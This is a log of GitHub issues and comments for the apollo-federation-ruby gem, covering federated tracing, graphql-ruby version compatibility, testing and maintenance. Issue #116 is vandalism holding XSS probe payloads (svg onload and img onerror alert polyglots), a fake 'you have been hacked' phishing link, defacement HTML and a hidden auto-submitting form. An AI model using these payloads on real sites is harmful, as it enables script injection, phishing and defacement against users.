[2019-08-01 00:09] lennyburdette opened #14 "Support for federated tracing"
Tracing works differently in a federated system than it does for a standard GraphQL server. It's officially [documented here](https://www.apollographql.com/docs/apollo-server/federation/metrics/).

Question 1: do you think this library should include support for generating the trace proto and attaching it to the response? It could be a separately library, but I think it makes sense to include all

[2019-08-01 20:37] rylanc commented on #14
Hi @lennyburdette!

1. I haven't given much thought to tracing yet (our gateway isn't live in production quite yet). From my understanding of federated tracing, it seems pretty specific to federation. So, it would make sense for the Ruby implementation to live in this repo.

2. To my knowledge, no one has attempted to implement this in Ruby. Are you feeling up to the task? 🙂 I'm happy to chip in,

[2019-08-01 21:13] lennyburdette commented on #14
👋 Rylan!

Definitely agree that federated tracing is _just_ different enough from standard tracing that it belongs here.

I'll have several hours on a plane with a laptop over the weekend so I'll get something started!

[2019-08-29 18:02] tjwallace opened #21 "Improve reference resolving performance"
Currently only one reference can be loaded at a time, and because the type is attached to the context, lazy objects can't be used.

Some ideas:
1. Figure out how to use lazy objects, or a different way of resolving types in `ApolloFederation::Entity.resolve_type`.
2. Allow each GraphQL type to define a `.resolve_references(references, context)` method that can load multiple references at the same

[2019-09-06 20:28] jstrater opened #23 "Support for .define-style schemas"
From the known issues and limitations section in the README:

It makes perfect sense that you'd implement this for class-based schemas first, since that seems to be the future of `graphql-ruby`. Are there any plans to support the `.define`-style schemas as well?

I have a large `.define`-style schema and I'd love to be able to use this gem with it!

[2019-09-10 17:38] #14 closed

[2019-09-11 14:45] cmschuetz commented on #21
This should provide a solution to suggestion 1: https://github.com/Gusto/apollo-federation-ruby/pull/17

[2019-09-13 18:40] rtymchyk commented on #23
Does the full schema need to be converted to class-based style?

[2019-09-17 21:53] ryannealmes opened #24 "Struggling to extend type in nodejs service"
I have been trying to get this working for the past day and have hit a blocker. Any help would be appreciated.

I have created a dummy service - customer service (in nodejs) - and another dummy service - schedule service (in ruby). I want to create a one to many relationship between customer and schedule. i.e. a customer can have many schedules.

I have managed to get queries like the following wo

[2019-09-17 22:02] ryannealmes opened #25 "Question around code in docs."
In the [docs](https://github.com/Gusto/apollo-federation-ruby#getting-started) you have the following

[code]
What is the purpose of the second last line?

[2019-09-18 18:16] ryannealmes commented on #24
I have created simple demo repo to demonstrate the issue - https://github.com/ryannealmes/graphql-ruby-apollo-example

To get going:
[code]
- Go to localhost:3000/graphiql
- Run the following query
[code]
Run it again with the commented out code.

I am hoping I just have something setup incorrectly, but I have followed the docs and I just can't for the life of me find the issue :(
Any help would b

[2019-09-18 18:51] ryannealmes commented on #24
I have found the issue by luck. Although I don't have much experience so not really sure if this is a bug or expect

https://github.com/quick-xp/apollo-federation-sample/blob/master/review-ruby-2.4/app/graphql/types/base_field.rb#L8

The above repo had the same issue and they commented out the `resolve_field` method which fixed things. It would be great to get some input on the expected behaviour

[2019-09-18 19:16] ryannealmes opened #28 "Production release?"
I see the gem is still in the beta stage. Is there a roadmap to release? We would really like to leverage this in a production capacity :)

[2019-09-25 17:39] lennyburdette opened #29 "Tracing improvements"
Tracking some feedback from Apollo on the [java implementation](https://github.com/apollographql/federation-jvm/pull/25) that's also relevant to this implementation.

- [ ] Use `Base64.strict_encode64`

- [ ] Capture parse and validation errors and attach them to the root node

[2019-10-04 18:36] cabello opened #30 "Request for comments: extensibilty"
Hi 👋

We are working on building a federated graph and this gem is helping us getting closer to a production release. 😄 I've been tasked to control the visibility of the schema so the external Federated schema does not expose every single field from internal schemas.

So far my proposed solution is simple, users opt-in to have their fields/objects exposed, I am following the documentation on [Limi

[2019-10-04 21:47] noaelad commented on #29
Adding some color on the second list item:

When following the current Readme instructions and enabling tracing, there are a couple of cases that result in the following error being raised, such as an invalid or unparsable query.
https://github.com/Gusto/apollo-federation-ruby/blob/57ecc5baff0d628e1b3f71161eb232fadbc05938/lib/apollo-federation/tracing.rb#L23
The error reads "... Add `use ApollFede

[2019-10-04 21:57] noaelad commented on #25
Thanks for the question!
The `field_class` method is a way of specifying the class that fields are created with when they are defined in your schema. This is essentially following this guide:
https://graphql-ruby.org/type_definitions/extensions#customizing-fields

Hope that helps!

[2019-10-14 14:20] cmschuetz opened #36 "Consider snake_case for fields"
While implementing the federation spec for a few types, I got tripped up when referencing fields in the `key` helper and `resolve_reference`.  Since all of the fields in `graphql-ruby` use snake case, I sometimes forget that the helpers for federation use the actual camelCased field names.

When authoring this library, was snake_case considered, and if so were there any reasons to not use it?  I f

[2019-10-15 19:18] prikha commented on #36
I second that 👍

I like `graphql-ruby`'s handy convention.

https://graphql-ruby.org/type_definitions/objects.html#object-classes

Since federation serves as an extension it would be nice to naturally follow the same conventions...

[2019-10-18 18:53] daemonsy opened #37 "String keys for extensions"
In https://github.com/rmosolgo/graphql-ruby/issues/2246, any key in the extensions hash is stringified during execution for consistency.

Hence in places like https://github.com/Gusto/apollo-federation-ruby/blob/master/lib/apollo-federation/tracing.rb#L39, it's probably better to use strings to avoid subtle bugs.

[2019-10-22 19:54] rylanc commented on #21
@tjwallace Now that https://github.com/Gusto/apollo-federation-ruby/pull/17 has landed, is that enough to allow loading multiple references at once? Can you give me an example of when you would want to do that?

[2019-10-22 20:02] rylanc commented on #25
Closing this. Feel free to reopen if there are more questions

[2019-10-22 20:02] #25 closed

[2019-10-22 20:30] tjwallace commented on #21
@rylanc I'm going to go now that lazy objects are supported, thanks!

[2019-10-22 20:30] #21 closed

[2019-10-23 05:57] prikha commented on #29
@noaelad @lennyburdette would you mind adding your setup of distributed tracing to the example, since for me even if the query is running well without it, with it I either have an error you mentioned or no tracing payload.

[2020-01-23 21:47] fgrehm commented on #28
1.0.0 is out, I guess it is ready? :smile:

[2020-01-23 21:53] fgrehm opened #48 "Support for graphql 1.10+"
Hey there!

I've just started playing with this gem, so far so good, tks for getting this released :beer:  While I was experimenting with things, I tried to update to the recently released [graphql 1.10.0](https://github.com/rmosolgo/graphql-ruby/blob/master/CHANGELOG.md#1100-20-jan-2020) but found out that this gem is not compatible with it.

Was there a specific reason for locking the dep to 1.9

[2020-01-27 00:58] HectorMF commented on #48
Hi @fgrehm I was needing some of the connection features that were added to graphql 1.10.0 so I had a go at updating. There are some breaking changes.  I've made a pull request with the necessary changes: #49

[2020-01-31 15:45] rtymchyk opened #51 "Querying SDL Raises Exception in 1.0.1"
The error is `unknown keywords: request, current_user, auth, __pro_access_strategy__`

Reported from:
[code]

The query is:
[code]

Which is fired automatically from `@apollo/gateway`.

Fairly certain it is from https://github.com/Gusto/apollo-federation-ruby/pull/45.

[2020-01-31 16:34] rtymchyk commented on #51
The problem turned out to be that you need `graphql >= 1.9.18` for `apollo-federation >= 1.0.1`. We could update the dependencies but not sure if that's worth the hassle.

[2020-01-31 16:47] rtymchyk commented on #51
Apologies for the rollercoaster of updates here. At this point I am on `graphql = 1.9.19` and `apollo-federation = 1.0.1`, yet I am still seeing an exception thrown.

[2020-02-02 03:32] VinSpee commented on #51
I'm similarly getting `unknown keyword: controller` on

[code]

[2020-02-06 22:09] rjordan opened #53 "Passing data in context will cause a crash"
Given a schema call with context
result = schema.execute(
      query,
      operation_name: operation_name,
      variables: vars,
      context: { current_user: 'Bob' }
    )

{:query=>"query GetServiceDefinition { _service { sdl } }", :operationName=>nil, :vars=>{}, :schema=>ProductSchema}

will result in

ERROR ArgumentError: unknown keyword: current_user

Given a token we include the current

[2020-02-26 17:39] rtymchyk commented on #53
Looks like duplicate ohttps://github.com/Gusto/apollo-federation-ruby/issues/51

[2020-02-26 17:55] rtymchyk opened #55 "What is causing intermittent ApolloFederation::Tracing::NotInstalledError?"
In my schema I use `use ApolloFederation::Tracing`.

My controller method looks like this:

[code]

Every now and then I see a `ApolloFederation::Tracing::NotInstalledError` raised. At first I thought maybe it's the multiplexing that causing issues, but the errors are tripped for a single query.

I can also confirm that there are queries getting detailed traces in Apollo Graph Manager, so some of

[2020-03-06 08:50] robinboening commented on #51
Any update on this? I am running into the same issue atm.

[2020-03-06 09:31] rtymchyk commented on #51
This is fixed in v1.0.2

[2020-03-06 09:31] #51 closed

[2020-03-06 19:30] robinboening commented on #51
Nice 👍 thanks!

[2020-04-03 11:24] mastery-preeti-bhambhani opened #61 "Error in loading schema for query"
[code]
Without the query() things work fine.
Once I add the query() i get the below error

[code]

Please advise

[2020-04-21 16:31] tjwallace opened #63 "Cannot use new interpreter with apollo-federation-ruby"
Using the [new `graphql-ruby` interpreter](https://graphql-ruby.org/queries/interpreter.html) with `apollo-federation-ruby` does not work.

* Query: `{ _service { sdl } }`
* Error: `Field '_service' doesn't exist on type 'Query'`

### Schema
[code]

### Versions
* `graphql-ruby`: `1.10.7`
* `apollo-federation-ruby`: `1.0.4`

**Note:** The new interpreter + `apollo-federation-ruby` did work with `g

[2020-05-07 21:22] bilby91 commented on #63
Having the same issue with GraphQL 1.10

[2020-05-08 19:42] bilby91 commented on #63
I've been doing some experimentation with adding support for the new interpreter. I have it working but the changes will probably require to change the approach on how the federation is setup.

I can probably send a MR to discuss this. I also found that the current implementation of overriding the root query breaks other dependencies like `graphql-guard`.

[2020-05-09 02:31] bilby91 commented on #63
I'm trying to see if we can use/build an API that would let us hook the different pieces that are needed for federation here https://github.com/rmosolgo/graphql-ruby/issues/2928

[2020-05-11 20:52] bilby91 commented on #61
@mastery-preeti-bhambhani Are you using the new interpreter ?

[2020-05-27 22:28] #63 closed

[2020-05-27 22:32] rylanc commented on #63
:tada: This issue has been resolved in version 1.1.0 :tada:

The release is available on [GitHub release](https://github.com/Gusto/apollo-federation-ruby/releases/tag/v1.1.0)

Your **[semantic-release](https://github.com/semantic-release/semantic-release)** bot :package::rocket:

[2020-05-27 22:35] rylanc commented on #48
The latest release (1.1.0) should fix compatibility issues with graphql 1.10.0. Please refile an issue if you run into any more trouble.

[2020-05-27 22:35] #48 closed

[2020-05-27 23:02] rylanc commented on #23
Closing this, since we (unfortunately) will probably never support `.define` schemas. They're quickly being deprecated in graphql-ruby as well.

[2020-05-27 23:02] #23 closed

[2020-05-27 23:04] rylanc commented on #24
Hi @ryannealmes. Sorry for the delay. Is this still an issue for you?

[2020-05-27 23:05] #28 closed

[2020-05-27 23:07] rylanc commented on #53
Closing as this looks to be fixed in https://github.com/Gusto/apollo-federation-ruby/pull/45

[2020-05-27 23:07] #53 closed

[2020-06-04 22:49] kented opened #74 "How to test/confirm federation implementation?"
Thanks for this gem, I think it will do just what I need. I've added the gem to my app and followed the steps for updating my schema and classes. Is there any documentation in regard to how I should test to confirm my changes?

[2020-06-09 16:40] iamgnlc opened #79 "Field '_service' doesn't exist on type 'Query'"
I've configured my Rails app per documentation and now trying to get the schema through my gateway build in Node.js, but got:

[code]

The gateway is working fine with other federated apps, either build in rails or Node.js.

[2020-06-09 17:51] kented commented on #74
Managed to test my changes. If it'd be helpful to others, I might be able to contribute some documentation in regard to what an rspec test could look like for apollo federation integration.

[2020-09-03 04:32] coduccin opened #96 "Creating service and gateway in Rails"
Has anyone had any success building and running federated services and a gateway in a Rails app? I already have federated my schema and am trying to get each GraphQLServer running for each service.

[2020-09-28 15:42] rtymchyk commented on #55
@rylanc is this fixed with https://github.com/Gusto/apollo-federation-ruby/pull/102 by any chance

[2020-10-02 15:59] AlexKlim opened #106 "Generate federated schema"
Hi all,
I want to generate a federated schema. But I get the schema without any directives/etc.

for instance, I have

[code]

when I use a [general way](https://github.com/rmosolgo/graphql-ruby/blob/master/lib/graphql/rake_task.rb) to generate schema into SDL, JSON, I get an incorrect federated schema

[code]

How can I generate a federated schema?

[2020-12-03 01:33] brettfishman commented on #106
Hello 👋

I think you're looking for something like this?

[code]

I ran into this same issue myself, and someone on the Apollo team provided this solution. Let me know if that works for you.

[2021-02-09 03:16] linhdangduy opened #115 "[question] Is this project maintained?"
Firstly, thank so much for the gem!

We consider to use this gem, but the last update is 2020/10 and seem there are no activities since that time. Is there a plan to continue maintain this gem?

[2021-02-11 17:30] BatuhanW commented on #115
We are using this gem production for a while and it does the job.

[2021-02-11 17:32] BatuhanW commented on #74
@kented Would you mind sharing your approach?

[2021-02-11 17:38] BatuhanW commented on #24
@ryannealmes I had the same issue. Using `OpenStruct` instead of Hash fixes the issue.

[code]

[2021-02-12 02:22] kented commented on #74
This is how I test the resolver for a model called 'User' in one of the apps I built:
[code]

I extracted this answer from a more complex test suite I wrote several months ago, so it may contain some errors. Hopefully it provides enough guidance to be helpful.

The gem's test suite also has some examples you can see here: https://github.com/Gusto/apollo-federation-ruby/blob/master/spec/apollo-fede

[2021-02-20 21:55] rtymchyk commented on #115
The gem may have a lack of updates because the the federation spec is pretty simple, so there's not a whole lot to maintain. Regardless, we've been using the core functionality in production for a while without problems as well. Tracing is a little iffy but it's optional.

[2021-02-21 06:52] Imang11 opened #116 "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>"
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}

[2021-02-21 06:52] Imang11 commented on #116
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}

[2021-02-21 06:52] Imang11 commented on #116
#111 #
<script>
var junk = '</script><script>alert(1)</script>';
![phpshell php (3)](https://user-images.githubusercontent.com/53512511/108617868-5f0bd400-73ce-11eb-97e5-8ac8b9cbc199.jpg)

1.

</script>``

[2021-02-21 07:02] Imang11 commented on #116
"><img src=https://www.no-gods-no-masters.com/images_designs/anonymous-gandhi-d001001207265.png>”@x.y "

[2021-02-21 07:05] Imang11 commented on #116
You have been hacked. Click <a href="http://phishing-site">here</a> to reset your password.<div style="display:none">

[2021-02-21 07:05] Imang11 commented on #116
You have been hacked. Click <a href="http://nepal.com">here</a> to reset your password.<div style="display:none">

[2021-02-21 07:08] Imang11 commented on #116
</br><h1>HACKED BY TALAOHU28</h1><img src="http://progress28.web.id/abc.jpg"></br><h1>I WANT TO BACK FREE</h1></br>

[2021-02-21 07:14] Imang11 commented on #116
<h1>hacked</h1>
<marquee behavior="scroll" direction="left">hacked</marquee>
<h1 style="background-color:#000099;">hacked</h1>

[2021-02-21 07:14] Imang11 commented on #116
`<h1>hacked</h1>
<marquee behavior="scroll" direction="left">hacked</marquee>
<h1 style="background-color:#000099;">hacked</h1>`

[2021-02-21 07:15] Imang11 commented on #116
<html>

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.███████" method="POST">
      <input type="hidden" name="keyword" value="&lt;a&#32;href&#61;https&#58;&#47;&#47;naglinagli&#46;github&#46;io&gt;Click&#32;here&#32;to&#32;win&#32;1000&#36;&#33;&lt;&#47;a&gt;" />
      <input type="hidden" name="Find&#32;Case&#32;Studies" value="Find&#32;Case&#32;Studies

[2021-02-21 07:16] Imang11 commented on #116
<!DOCTYPE html>
<head>
</head>
<body>
<h1>The logo!</h1>

<p>This HTML page was uploaded instead of a logo image.</p>
<p>Content Security Policy (CSP) prevents Javascript from executing as far as I can tell - except in Internet Explorer 11. View this page in IE 11 and you should see a pair of Javascript alert dialogs demonstrating code execution.</p>

<svg/onload=alert('SVG

<img/id="alert&lpar;'i

[2021-02-21 07:17] Imang11 commented on #116
<a href="https://google.com">test</a>

[2021-02-22 01:32] linhdangduy commented on #115
I also see that [the federation spec is not updated since 2020/10](https://github.com/apollographql/federation/blob/main/docs/source/api/apollo-federation.mdx), so agree there are no big update here.

Things I just worry is there are [pull requests](https://github.com/Gusto/apollo-federation-ruby/pulls) are not resolved. It is so helpful if the maintainers spend time discuss , or close stale one,

[2021-02-23 15:14] rtymchyk commented on #96
Your best bet is federated Rails app, and using a Node apollo-gateway for merging the services together.

[2021-02-23 15:14] rtymchyk commented on #55
Doesn't seem to be an issue anymore on the latest version.

[2021-02-23 15:14] #55 closed

[2021-02-25 19:53] foerever commented on #79
I'm also experiencing this issue. Wondering if it may be related to having a `Graph::Types::BaseObject` with a `graphql_name` of `Query` which may be conflicting with:
https://github.com/Gusto/apollo-federation-ruby/blob/401ab8eadb4acf1a612c91432f5044c0dbfe6da2/lib/apollo-federation/schema.rb#L39

[2021-03-03 15:44] Austio opened #118 "Readme Beta Comment"
:wave: Hello, thank you for this fantastic contribution to graphql ruby.

Is this system actually in "beta" mode as the README state?  I have used this in a relatively complex scenario and it seems to be fully spec compliant.

If that is the case, would you accept a PR to remove the beta declaration out of the README?

Thanks again!

[2021-03-16 02:25] neroleung opened #121 "Add support for google-protobuf v3.15.3 and up?"
Just found out that the tracing part of this gem is not compatible with `google-protobuf` v3.15.3 and up. It can be reproduced by updating the version to `3.15.3` in https://github.com/Gusto/apollo-federation-ruby/blob/1d3baf4f8efcd02e7bf5bc7e3fee5b4fb963cd25/apollo-federation.gemspec#L31, `bundle update google-protobuf`, and then run `rspec spec/apollo-federation/tracing_spec.rb`.

We would then

[2021-03-21 00:06] #115 closed

[2021-03-25 13:14] gtkatakura opened #123 "Support for schema registration"
Hey, guys. How you are dealing with publishing your services schemas to the gateway? Are you using something similar to [schema registration](https://www.apollographql.com/docs/studio/schema/schema-reporting/)?

[2021-04-14 03:59] rtymchyk commented on #123
I am using the Apollo CLI to publish a printed out schema to the managed service. As long as the gateway connects to Apollo Studio, it will pick up any changes.

https://www.apollographql.com/docs/studio/schema/cli-registration/

[2021-04-23 23:19] lennyburdette commented on #106
`puts UsersSchema.federation_sdl` is even better! I just opened a PR to add this to the readme: https://github.com/Gusto/apollo-federation-ruby/pull/126

[2021-06-24 21:13] yahve opened #134 "Has anyone been able to integrate this library with rails?"
I'm trying to integrate this library to my rails apps in graphql, apparently everything is fine, but the gateway gives an error `syntax Error: Expected Name, found"} ".`

from the console of my rails applications, I don't see much detail to help me

this same gateway file, the poor thing with other graphql services made in nodejs and everything fine

[2021-06-25 15:34] #134 closed

[2021-08-17 02:24] #121 closed

[2021-09-23 14:20] Austio opened #142 "Help as a maintainer"
Hey Gusto,

Thanks for the awesome gem.  What is the process to get involved with maintaining the gem.  A few things that I think i could help with
 - Cutting new releases
 - Merging PRs for docs
 - Prepping the gem to support gateway 2 that is coming out and the changes there

Thanks!

[2021-10-18 06:56] linhdangduy commented on #142
What do you think? @rylanc @kryptonat

My team really want to update team's project dependencies regularly, but apollo-federation-ruby is blocking some updates.
It's so grateful if you add other people to support maintaining this awesome gem.

Thanks!

[2021-10-31 17:58] LiChoi opened #144 "Compatibility with Mac M1's"
When trying to do rails:db migrate, I encounter this error message due to apollo-federation gem:

rails aborted!
LoadError: cannot load such file -- google/protobuf_c

google/protobuf is the issue, but not sure how to solve this
https://github.com/protocolbuffers/protobuf/issues/8062

[2021-11-04 00:21] bjacobso commented on #144
We are seeing a similar issue:
[code]

[2022-01-10 20:26] daemonsy commented on #74
Hi @kented , your approach was  how I tested one of our internal app that's using federation. It works but can be pretty confusing to someone who has less exposure to federation. But I do like that it creates a relatively honest test.

Maybe in the future, the maintainers might consider some test helpers. For now, I'll try to add a PR that highlights this as a testing strategy, save future readers

[2022-01-11 15:24] daemonsy opened #149 "Making `Query._entities` work with GraphQL Dataloader"
# Background
GraphQL Ruby has its own native batch loading abstraction that uses Ruby's fibers.

Right now, we are using it to resolve all N+1 queries in our app, except for incoming top level subgraph queries which are resolved by the `Query._entities` field.

## The problem

Given a query:

[code]
Where we have variables representing two objects to be resolved:

[code]

One might write a simple

[2022-01-11 17:04] kented commented on #74
Nice. I think what you've added to the README will be helpful to folks who are wondering how to test their implementation.

[2022-01-11 20:44] daemonsy commented on #144
Hopefully https://github.com/Gusto/apollo-federation-ruby/pull/150 and optionally, a version bump of `google-protobuf` will resolve M1 related issues.

I don't have a machine to reproduce the issue, but if folks who bumped into it can post bundler environment info, I'd appreciate it.

[2022-01-19 19:42] #74 closed

[2022-01-19 19:52] daemonsy commented on #24
Seems like there hasn't been a response to this issue for a while, so I'l close it. @ryannealmes if you're still having issues, please feel free to post back.

[2022-01-19 19:52] #24 closed

[2022-01-19 20:10] daemonsy commented on #149
In the end, I think the right way to do it is to return `dataloader.with(...).load` as the result of `resolve_reference`. If we need to do anything further like wrapping a service class over the entity, this can be done in the loader.

[2022-01-19 20:10] #149 closed

[2022-01-19 20:24] daemonsy commented on #96
Thanks for responding to this, @rtymchyk and that's the approach we currently use to tie services together.

[2022-01-19 20:24] #96 closed

[2022-01-19 20:39] daemonsy commented on #142
Hi @linhdangduy @Austio @rtymchyk @lennyburdette and others that I fail to mention. Thanks for all the help in raising and responding to issues.

I'm a Gusto employee who uses federation for my own projects. Volunteered to help maintain this repo. I have a working knowledge of GraphQL and its Ruby implementation, but really only used this library as a consumer. So picking up context along the way

[2022-01-20 01:44] #123 closed

[2022-01-20 02:13] daemonsy commented on #118
Likewise, we are actively using this library in our main user facing applications.

As a consumer of open source library, I would prefer libraries to list out limitations than having a beta disclaimer.

Happy to take a PR to remove the disclaimer.

[2022-01-20 08:22] Fadi25 opened #151 "Graphql 1.13.4+"
Hello Gusto,

I'm facing an issue when using the latest Graphql gem version.

It can be reproduced by changing the graphql version to (1.13.4 or 1.13.5)
rspec ./spec/apollo-federation/entities_field_spec.rb:72

Thanks

[2022-01-20 15:00] daemonsy commented on #151
Hey @Fadi25 looking at our appraisals file, we don't have support for GraphQL 1.1.3.x locked down yet. It's one of the higher priority items on my queue to look into.

Also see https://github.com/Gusto/apollo-federation-ruby/pull/147, I think that's a good place we can start.

[2022-01-20 19:04] lennyburdette commented on #142
Hi @daemonsy, Rylan and I were chatting a while back about making me a maintainer on this repo. I'd be happy to do so, but I can also just support you with PRs and PR review if it's too much work to get permission to add an outside contributor. Thanks for taking this on!

[2022-01-20 20:58] #106 closed

[2022-01-25 21:17] daemonsy opened #152 "feat: Explore using GraphQL Ruby's client directives"
GraphQL Ruby has support for client directives now. It could potentially reduce the surface area of this library by quite a bit.

We have quite a bit code that seems to be responsible for generating the SDL.

[2022-01-25 21:22] #37 closed

[2022-01-25 21:27] daemonsy opened #153 "Apollo Federation 2.0 support"

[2022-01-25 21:32] daemonsy opened #154 "CI badge says "No builds""
- The branch is wrong, badge is pinned to `master` where our default branch is `main`
- `main` branch builds seem to be failing 😄

[2022-01-25 21:46] daemonsy opened #155 "Cutting a release"
Seems like the last release was October 2020.

[2022-01-26 01:51] #144 closed

[2022-01-26 16:44] daemonsy opened #161 "Remove support for GraphQL 1.9.x"
- It creates additional complexity in this codebase
- It's pretty old at this point and has a lot of breaking changes compared to GraphQL 1.13.x

[2022-01-26 16:44] daemonsy commented on #151
Done a [spike](https://github.com/Gusto/apollo-federation-ruby/pull/160 ) on GraphQL 1.13.x support. It looks like the only real lift is to remove support from GraphQL 1.9.x, which cleans up the codebase quite a little too.

https://github.com/Gusto/apollo-federation-ruby/issues/161

[2022-01-26 23:03] #161 closed

[2022-01-27 00:01] #154 closed

[2022-01-27 14:07] #118 closed

[2022-01-27 14:21] rylanc commented on #144
:tada: This issue has been resolved in version 2.0.0 :tada:

The release is available on:
- `v2.0.0`
- [GitHub release](https://github.com/Gusto/apollo-federation-ruby/releases/tag/v2.0.0)

Your **[semantic-release](https://github.com/semantic-release/semantic-release)** bot :package::rocket:

[2022-01-27 14:21] rylanc commented on #161
:tada: This issue has been resolved in version 2.0.0 :tada:

The release is available on:
- `v2.0.0`
- [GitHub release](https://github.com/Gusto/apollo-federation-ruby/releases/tag/v2.0.0)

Your **[semantic-release](https://github.com/semantic-release/semantic-release)** bot :package::rocket:

[2022-01-27 14:21] rylanc commented on #118
:tada: This issue has been resolved in version 2.0.0 :tada:

The release is available on:
- `v2.0.0`
- [GitHub release](https://github.com/Gusto/apollo-federation-ruby/releases/tag/v2.0.0)

Your **[semantic-release](https://github.com/semantic-release/semantic-release)** bot :package::rocket:

[2022-01-28 17:41] geshwho commented on #155
Still learning about SemVer, but we've cut a couple releases at this point. I'm calling this issue closed.

[2022-01-28 17:41] #155 closed

[2022-01-29 00:51] geshwho opened #169 "Semantic release bot changes our Gemfile.lock"
The specific problematic bit is that it adds `-x86_64-linux` to the google-protobuf gem. [Here](https://github.com/Gusto/apollo-federation-ruby/commit/f24e83ed569770b96ed0ffd6a4b1f80f6203147b#diff-89cade48462044ee1b672dc5f4c3ec250fbd29effcd8932096a23c1283c6731fR45) is an example commit.

[2022-01-31 20:06] daemonsy commented on #169
## Reproduction
I spent some time investigating this and made some progress in reproducing this issue.

We have an option in semantic release rubygems that installs and update lockfiles of the appraisal to the latest version of the gem after release. That's pretty neat, it means all the specs are declared to run on the latest version.

In the [config](https://github.com/Gusto/apollo-federation-rub

[2022-01-31 21:55] daemonsy commented on #169
https://github.com/rubygems/rubygems/issues/5325

[2022-02-02 23:15] #36 closed

[2022-02-02 23:19] rylanc commented on #36
:tada: This issue has been resolved in version 2.1.0 :tada:

The release is available on:
- `v2.1.0`
- [GitHub release](https://github.com/Gusto/apollo-federation-ruby/releases/tag/v2.1.0)

Your **[semantic-release](https://github.com/semantic-release/semantic-release)** bot :package::rocket:

[2022-02-03 00:13] geshwho opened #173 "Consistent treatment for strings and symbols in field references"
#105 introduced new behavior that allows us to specify fields as symbols and automatically have the camelcased (e.g. `:product_id` becomes `productId`). In order to keep the change backwards compatible, the behavior of Strings remains unchanged. This means that there is inconsistent behavior between strings and symbols.

It would be great it, instead, we also camelize string input and give a globa

[2022-02-03 15:55] daemonsy commented on #142
Hi @lennyburdette sorry I missed your reply. Let me check in on this.

[2022-02-03 16:36] Austio commented on #142
@lennyburdette Thanks for volunteering to help

@daemonsy you may be aware of this, Lenny is a Solutions Architect for apollo so he has deep knowledge in Federation, how it is used on many Ruby apps and where the Spec is going with Federation 2

[2022-02-03 21:41] daemonsy commented on #142
Nice! That's great to know, I will definitely have questions about Apollo Federation. Pleasure to meet both of you 🙏

[2022-02-04 14:51] daemonsy opened #174 "Deprecate the use of `to_graphql`"
We define it on `def to_graphql` in `HasDirectives`. Currently deprecation warnings are silenced.

https://github.com/rmosolgo/graphql-ruby/blob/master/CHANGELOG.md#deprecations-2

I think this is only needed to support GraphQL 1.10 and 1.11. We could just delete this method eventually and drop support for the older versions when warnings are no longer silenced.

[2022-02-04 16:38] daemonsy commented on #151
Hi @Fadi25, we shipped "official support" for GraphQL 1.13.x. It's essentially just running specs against GraphQL 1.13.x.
Initially I thought we will be fixing some deprecations, but they went away with removing support for GraphQL 1.9.x.

I tried running our current specs against 1.13.4 and 1.13.5, they all passed.

Could you test if the latest version of the library works for you? If not, could

[2022-02-06 13:34] Fadi25 commented on #151
Thanks for the update @daemonsy,

Indeed tests are green now, however I tried updating gql to 1.13.5 and Apollo-federation 2.2.0 on my project, unfortunately I'm getting this error, for example after running mutation such as

      mutation {
        createRule(input: { threshold: 123 })
        { rule { id } }
      }

   Failure/Error:
       def to_graphql
         field_defn = super # Returns

[2022-02-09 15:27] daemonsy commented on #151
Thanks for the error report, it's very helpful. Looks like it's something that can be reproduced. I'll take a stab at it.

[2022-02-14 20:34] FunkyloverOne commented on #152
Hey @daemonsy! :wave:
How about just adding the support for directives, without thinning out the gem's codebase for now? :)
I assume it should be simple. :thinking:

[2022-02-14 21:55] modosc opened #175 "uninitialized constant GraphQL::Define"
we recently upgraded from `1.1.5` to `2.2.0` and started getting `uninitialized constant GraphQL::Define` errors in our specs.

https://github.com/Gusto/apollo-federation-ruby/blob/1d3baf4f8efcd02e7bf5bc7e3fee5b4fb963cd25/lib/apollo-federation/federated_document_from_schema_definition.rb#L59

as far as i can tell that class no longer exists in the graphql gem:

https://github.com/rmosolgo/graphql-

[2022-03-09 20:17] daemonsy commented on #174
`#to_graphql` removed in #177

[2022-03-09 20:17] #174 closed

[2022-03-09 20:18] daemonsy commented on #175
We don't support GraphQL 2.0 officially yet, but in #176, the author has added 2.0 to the matrix.

I can only look into this next week but if you like to tackle it, happy to take a PR!

[2022-03-09 20:20] daemonsy commented on #151
Sorry for the late reply @Fadi25.

We did have an issue the missing parameter in `to_graphql`. It's fixed in #177 (version 2.2.1) by removing the method.

[2022-03-09 20:20] #151 closed

[2022-03-10 16:08] daemonsy opened #181 "CI step to verify that there are no lockfile changes"
Sometimes we can forget to regenerate appraisal bundle lockfiles or it could be a local machine difference. Let's consider adding a CI step that verifies that the there are no diffs between the lockfiles.

[2022-03-11 19:33] modosc commented on #175
thanks - this fixes it for us.

[2022-03-11 19:33] #175 closed

[2022-03-11 23:01] kxuenvoy opened #183 "Method key does not exist on T.class_of(Types::UserType)"
Hi, I am trying to use apollo-fderation-ruby in my project.

After I added key keyword. 'bundle exec srb tc' check will fail as below. Any Idea how to resolve this problem.

Quote:
app/graphql/types/user_type.rb:10: Method key does not exist on T.class_of(Types::UserType) https://srb.help/7003
    10 |    key fields: :id
END.

[2022-03-11 23:24] kxuenvoy commented on #183
Is there any guideline for  srb support for apollo fderation?

[2022-03-14 19:46] daemonsy commented on #183
Hey @kxuenvoy I don't use sorbet myself, but there should be nothing that prevents this library from working with sorbet, like any other ruby library. From the error and the sorbet link, it looks like sorbet is saying the method `key` is present on `UserType`.

Is the module included such that `Types::UserType.key` exists? i.e. like the example we have below in the README.

[code]

Otherwise, it w

[2022-03-22 14:10] daemonsy commented on #183
Based on what's posted so far, sorry I don't have a better idea of what's going on. If you think the problem is with the federation library, could you reproduce it in an open repo?

[2022-04-25 02:08] col commented on #153
Is anyone working on adding support for Apollo Federation 2.0?

If not, any thoughts or discussions on how this would be approached?

[2022-04-26 13:58] col commented on #153
Draft PR that adds support for `@shareable` directive. https://github.com/Gusto/apollo-federation-ruby/pull/195

[2022-04-27 02:54] col commented on #153
Updated the PR to include `@override` as well. https://github.com/Gusto/apollo-federation-ruby/pull/195

These changes were surprisingly straight forward but I'm not sure if I'm missing something.

Do you think we need to warn people if they try to use a v2 directive when running a v1 gateway? I'd be happy to support something like this but we don't currently have any indication of which version t

[2022-05-19 15:56] ivanbrennan opened #197 "Enabling federated tracing breaks multiplex"
